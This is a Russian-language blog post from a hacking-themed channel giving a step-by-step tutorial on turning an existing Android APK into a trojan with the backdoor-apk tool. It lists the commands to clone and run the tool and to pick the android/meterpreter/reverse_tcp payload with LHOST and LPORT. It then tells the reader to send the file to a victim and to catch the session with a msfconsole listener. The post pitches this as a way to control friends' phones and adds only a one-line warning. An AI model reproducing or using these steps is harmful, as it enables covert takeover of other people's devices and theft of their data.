Найти в Дзене
H@ckboard & ApK Premium
6 подписчиков

Взлом любого Android, используя шелл скрипт и APK-файл

134
2 мин
Взлом Android-мобильных устройств всегда доставляет удовольствие хакерам и исследователям безопасности. Ранее мы показали другие способы взломать Android с помощью Androspy. На этот раз это будет через сценарий оболочки. Теперь давайте сначала разберемся, что такое файл APK? APK - это расширение программного обеспечения/приложения, которое установлено на вашем Android телефоне. А теперь представьте, что вы можете управлять мобильными друзьями, создав бэкдор для существующего файла APK. Это означает, что вы можете изменить любое существующее любое приложение, чтобы стать бэкдором. По словам исследователя Международного института кибербезопасности, есть еще много передовых способов сделать это. Но сегодня мы покажем простой способ создать бэкдор для любого существующего APK-файла, используя инструмент под названием backdoor-apk. Этот инструмент делает файл APK вредоносным, связывая бэкдор с файлом APK. Если жертва откроет файл, хакер получит контроль над Android Mobile. Завершенные про
Оглавление

Взлом Android-мобильных устройств всегда доставляет удовольствие хакерам и исследователям безопасности. Ранее мы показали другие способы взломать Android с помощью Androspy. На этот раз это будет через сценарий оболочки. Теперь давайте сначала разберемся, что такое файл APK? APK - это расширение программного обеспечения/приложения, которое установлено на вашем Android телефоне. А теперь представьте, что вы можете управлять мобильными друзьями, создав бэкдор для существующего файла APK.

Это означает, что вы можете изменить любое существующее любое приложение, чтобы стать бэкдором. По словам исследователя Международного института кибербезопасности, есть еще много передовых способов сделать это. Но сегодня мы покажем простой способ создать бэкдор для любого существующего APK-файла, используя инструмент под названием backdoor-apk. Этот инструмент делает файл APK вредоносным, связывая бэкдор с файлом APK. Если жертва откроет файл, хакер получит контроль над Android Mobile. Завершенные процессы выполняются в одной командной строке.

Создаём вредоносный APK файл

Используйте эту команду для клонирования проекта.

git clone https://github.com/dana-at-cp/backdoor-apk

Используйте команду cd для входа в каталог backdoor-apk

root@kali:/home/iicybersecurity# cd backdoor-apk/backdoor-apk/
root@kali:/home/iicybersecurity/backdoor-apk/backdoor-apk#

Перед запуском инструмента нам нужно скачать APK файл из интернета. Мы используем ROUTERPWN.

После загрузки файла перейдите в каталог backboor-apk, используя mv <имя файла> destination/file/path/

Теперь используйте эту команду для создания backboor ./backdoor-apk.sh AndroidPRO_1.6.152.apk

-2

После запуска инструмента выберите инструмент полезной нагрузки, который сам отображает его.

Здесь мы выбираем вариант 3 для android/meterpreter/reverse_tcp.

Мы должны установить LHOST и LPORT.

Затем мы должны выбрать разрешение для манифеста Android, выбрав опцию. Здесь мы выбираем вариант 1 оригинал

Инструмент автоматически привязывает бэкдор к исходному файлу.

Теперь отправьте файл бэкдора жертве.

Теперь на хакерской машине запустите слушатель с помощью этой команды: msfconsole -r backdoor-apk.rc

-3

Успешно завел слушателя.

Если жертва установит apk на свой мобильный, сеанс будет запущен на компьютере хакера.

-4

Здесь жертва установила APK-файл на свое устройство.

-5

Хакер успешно получил сессию мобильного Victim. Мы получили доступ к мобильным жертвам.

Заключение

Как мы увидели, как легко создать бэкдор для существующего APK-файла и получить доступ к мобильным жертвам, выполнив одностадийную командную строку. Поэтому пользователь должен быть осторожен при установке любого ненадежного APK-файла.

Mr. & Ms. Adler